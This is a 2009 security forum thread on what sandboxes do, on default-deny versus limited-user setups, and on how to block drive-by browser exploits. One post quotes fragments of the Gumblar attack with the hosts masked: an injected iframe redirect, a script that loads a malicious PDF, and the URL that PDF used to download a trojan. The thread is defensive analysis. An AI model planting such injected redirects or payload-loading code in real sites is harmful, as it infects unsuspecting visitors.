What's the point of sandboxes?

Discussion in 'sandboxing & virtualization' started by Someone, May 23, 2009.

Thread Status:
Not open for further replies.
  1. Rmus

Rmus Exploit Analyst

OK, thanks for the explanation. It makes sense.

That is not clear: if there is default-deny at the gate, what does it matter whether you are running as Admin or LUA?

----
    rich

2. ParadigmShift

ParadigmShift Registered Member

I've seen one (old .wmf exploit) back a few years ago that did provide the user with a prompt even with Javascript/Java disabled. If the user clicked OK on that prompt they would have been infected as I did on my test box at the time with Opera v8.54. Proxomitron effectively blocked that prompt however. (God bless it)

3. Kees1958

Kees1958 Registered Member

Sorry Rich

It is a moving scale.

Most secure (prevent) is default deny. This can be implemented through SRP or running as admin and using an application like AE2. AE2 has a white and blacklist, even for programs residing in the user space (so independantly whether you run ADMIN/LUA), so it can be called a SMART SRP.

Restricting rights (you allow everything to execute, but allow them less or more access to critical resources) can be achieved by User Management (running as LUA) or with Programs like DW. With DefenseWall only untrusted programs and files run LUA independantly of whether you are Admin or LUA or where the program file/downloaded file is located. Like AE2 implements SRP accross user domains, DW implements LUA accross user domains.

Regards

4. Rmus

Rmus Exploit Analyst

One person I know runs as Admin with SRP and says SRP provides default-deny, as he's shown me in many tests of live exploits. So, I guess it's how the user feels he/she is protected.

I didn't realize AE2 has a blacklist. Can you explain?

thanks,

rich

5. Rmus

Rmus Exploit Analyst

If the user clicks OK, then it's not a drive-by exploit any more.

----
    rich

6. ParadigmShift

I just remember with this infection, IE was a 'drive-by', but Firefox and Opera were both prompted. This was the only infection I ran across at the time that would give a prompt in Opera even with Javascript disabled. It startled me.

7. Rmus

Rmus Exploit Analyst

The wmf exploit used i-frame and not javascript.

This would genererate a prompt in Opera no matter the scripting setting. I just tested to be sure:

wmf-OP.gif

This brings me back to the original assertion that Opera (so far!) is immune from known drive-by attacks.

----
    rich

8. Kees1958

Kees1958 Registered Member

Rich,

Sorry my fault, I thought they it had one.

9. ParadigmShift

Thank you for that Rmus. I've always turned off i-frames in Opera since v9.

Also, do you prefer AE2 over AE3?

10. Someone

Someone Registered Member

Would a sandbox contain vulnerabilities in browsers, flash player, etc? Would one be vulnerable to something like "Gumblar" if no sandbox is used?

11. Rmus

Rmus Exploit Analyst

This depends on how you have scripting configured in your browser.

The analyses of gumblar and similar exploits show that the user is redirected from a website that has been compromised with malicious code, to one of the .cn sites.

Once on the .cn site, a script sets in motion the attack to serve up various exploits.

If the browser has scripting configured per site, then the script on the .cn page cannot execute. Here is an example of a current one still active. The injected code on the legitimate site has this command to send the user to the .cn site:

Code:
    i frame src="http://xxxxxxxxxxx.cn/in.cgi?income56
    That .cn page has a script to load a malicious PDF file:

Code:
    document.write('< i frame src="cache/readme.pdf" 
    If the browser has scripting and plugins enabled, the PDF file will load into the i-frame. The exploit code in this PDF file
    does not work on my version of the Reader, so the PDF file just sits in the i-frame and does nothing.

gumblar-1.gif

With scripting disabled, a blank page displays because the script cannot execute, and no i-frame displays:

gumblar-2.gif

Nonetheless, it's wise to have in place something to catch the remote code execution of malware downloads
    in case of accidents or new types of exploits.
    In a PDF file that did work, the code attempted to download a trojan file:

Code:
    http://XXXXXX.cn/load.php?id=4
    aeAlert.gif

----
    rich

12. Someone

Would one be vulnerable with default settings? How do you configure scripting in Firefox? Would something like disabling Javascript or using NoScript stop these attacks?

Would an outbound firewall help in these case?
    Thanks

13. Rmus

Rmus Exploit Analyst

Disabling Javascript prevents the drive-by PDF exploits from starting. I use Firefox mainly for testing, and I configure scripting in the Options:

ff-pref.gif

This controls javascript globally. I'm not sure, but I think NoScript allows for per site configuring, like Opera does.

Yes, assuming you have not granted permission for the Acrobat Reader to connect out to the internet!

See here for stepping through a PDF exploit:

http://www.urs2.net/rsj/computing/tests/pdf

----
    rich

Last edited: May 31, 2009
  14. Someone

What PDF readers would most current exploits work with? Is it just Adobe Reader, and if so what versions of Adobe? Thanks

15. Rmus

Rmus Exploit Analyst

16. TonyW

TonyW Registered Member

No doubt the technology behind such programs is amazing, but I'm still trying to understand when it's best to use something like Sandboxie or KIS 2010's Safe Run. For example, I personally wouldn't sandbox this particular browsing session being on Wilders or checking the news at the BBC. However, I did use a sandbox to test out the site of a fraudulent security program recently though.

Last edited: Jun 20, 2009
  17. Acadia

Acadia Registered Member

You can get hit by a drive-by-download even on a safe, respected site if it has been hacked. There have been several examples of this lately but I cannot remember any of the well known sites that were hit and unknowingly started infecting folks.

Acadia

18. TonyW

TonyW Registered Member

I'm aware legitimate sites may fall foul of exploits/malware. I guess this is where other protection measures come into play; for example, I use Firefox with the NoScript addon bolted on.

I came across such a website recently that was compromised, and the KL script emulator picked it up. The link to the site was sent for further analysis, and detection was added to the next update for a trojan-clicker contained in the index file. The site was eventually cleaned up, and no longer was picked up by a number of AVs.

19. Sully

Sully Registered Member

I guess a lot depends on you having the knowledge that if you always run in SB, certain security aspects shuold be handled. If you always do, then you always know. If you only do selectively, then you only know at certain points. Some peeps just like to know.

I do as you though, I don't place all my browsing in sandbox, only selectively.

Sul.

20. TonyW

TonyW Registered Member

I'd like to ask a question, which hopefully some of you more knowledgeable might be able to answer.

I understand the point of sandboxing and, in particular, how Sandboxie is used, but from what I can see it creates a folder or folders where sandboxed material goes. In the case of Sandboxie, it's a single sandbox folder.

Why doesn't malware escape from that folder? I appreciate the point is to separate items from rest of system, but the folder looks like any other. So what's the difference from running things there and from the usual destinations? I mean if you use say Ccleaner to clear out the internet cache after a browsing session, that stuff has gone. Emptying the sandbox is doing the same thing?

21. Peter2150

Peter2150 Global Moderator

It's not that it's just a separate folder, but things running under sandboxie's control are limited in how it interacts with the system, plus a program that might write things to the system and elsewhere is actually writing them to the sandboxie folder.

22. Sully

Sully Registered Member

Open c:\sandbox\box..

Execute anything. Text file, program, etc etc.

Even if you are using cmd or explorer, what you execute starts in SB. SB control (service) would have to be shut down before those files could be executed outside of SB. It is interesting too, sometimes you drag and drop out of a sandboxed directory (forced or c:\sandbox\box) and the item seems to inherit SB rights, so even though it is on your real desktop, you execute it and it still starts in SB.

It seems from what I have tried, there is not a way for that c:\sandbox directory to be ran in normal OS. But then, maybe others have a method.

Sul.

Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.